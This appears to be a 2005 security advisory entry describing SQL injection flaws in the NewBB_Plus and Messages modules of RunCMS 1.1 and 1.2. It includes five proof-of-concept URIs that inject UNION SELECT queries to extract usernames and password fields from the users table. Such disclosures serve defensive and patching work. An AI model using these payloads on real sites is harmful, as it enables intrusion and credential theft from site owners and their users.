exploits , vulnerabilities , articles , RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities

Title	RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities
Published	2005-08-22-12:00AM
Updated	2005-08-22-07:51PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	James Bercegay of the GulfTech Security Research Team is credited with the discovery of these vulnerabilities.
Vulnerable	RunCMS RunCMS 1.2 RunCMS RunCMS 1.1 A RunCMS RunCMS 1.1
Not Vulnerable
Code	No exploit is required. The following proof of concept URI are available: http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/* http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/&post_id=2'&topic_id=2&viewmode=flat&order=0 http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/&post_id=2&topic_id=2&viewmode=flat&order=0 http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/&op=print_pn http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/&op=print_sent_pn
TXT